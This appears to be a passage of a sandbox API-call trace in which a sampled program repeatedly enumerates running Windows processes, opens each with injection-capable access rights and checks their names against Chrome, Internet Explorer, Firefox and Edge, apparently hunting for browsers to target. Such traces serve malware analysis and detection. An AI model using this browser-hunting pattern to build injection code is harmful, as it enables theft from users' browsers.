	[0240.772] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.772] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x83f0
	[0240.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.773] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.774] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.774] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.774] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.774] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.775] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x83f4
	[0240.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.775] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.776] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.776] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.776] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.777] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0240.777] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x83f8
	[0240.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.778] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0240.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.778] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.778] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0240.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.778] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.779] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0240.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x83fc
	[0240.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.780] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.780] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.780] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.781] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.781] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0240.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x8400
	[0240.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.782] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0240.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.782] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.782] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0240.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.783] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.783] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.784] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x8404
	[0240.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.784] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.784] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.784] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.785] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.785] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0240.786] CloseHandle (hObject=0x4fd0) returned 1
	[0240.786] Sleep (dwMilliseconds=0x64) 
	[0240.882] GetCurrentProcessId () returned 0x110
	[0240.882] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0240.889] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0240.890] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0240.891] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0240.891] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8408
	[0240.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.892] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0240.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.892] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.892] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0240.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.892] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.893] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0240.893] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x840c
	[0240.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.894] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0240.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.894] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.894] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0240.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.895] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.895] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0240.896] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x8410
	[0240.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.896] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0240.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.896] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.897] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0240.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.897] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.897] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0240.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8414
	[0240.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.898] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0240.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.899] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.899] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0240.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.899] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.899] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0240.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8418
	[0240.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.900] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0240.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.901] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.901] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0240.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.902] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.902] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0240.903] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x841c
	[0240.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.903] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0240.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.904] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.904] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0240.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.905] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.905] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0240.906] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x8420
	[0240.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.906] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0240.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.906] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.906] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0240.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.907] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.907] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0240.908] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x8424
	[0240.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.908] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0240.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.908] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.908] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0240.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.909] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.909] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.910] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8428
	[0240.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.910] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.910] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.910] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.911] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.911] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.912] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x842c
	[0240.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.912] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.912] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.913] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.913] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.913] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8430
	[0240.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.914] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.915] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.915] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.915] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.915] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8434
	[0240.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.916] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.917] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.917] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.917] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.918] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.918] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8438
	[0240.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.919] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.919] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.919] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.920] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.920] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.921] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x843c
	[0240.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.921] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.921] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.921] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.922] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.922] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.923] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8440
	[0240.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.923] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.923] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.924] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.924] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0240.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8444
	[0240.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.925] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0240.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.925] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.926] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0240.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.926] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.928] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8448
	[0240.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.928] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.928] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.928] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.929] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.929] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0240.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x844c
	[0240.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.930] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.930] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.931] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
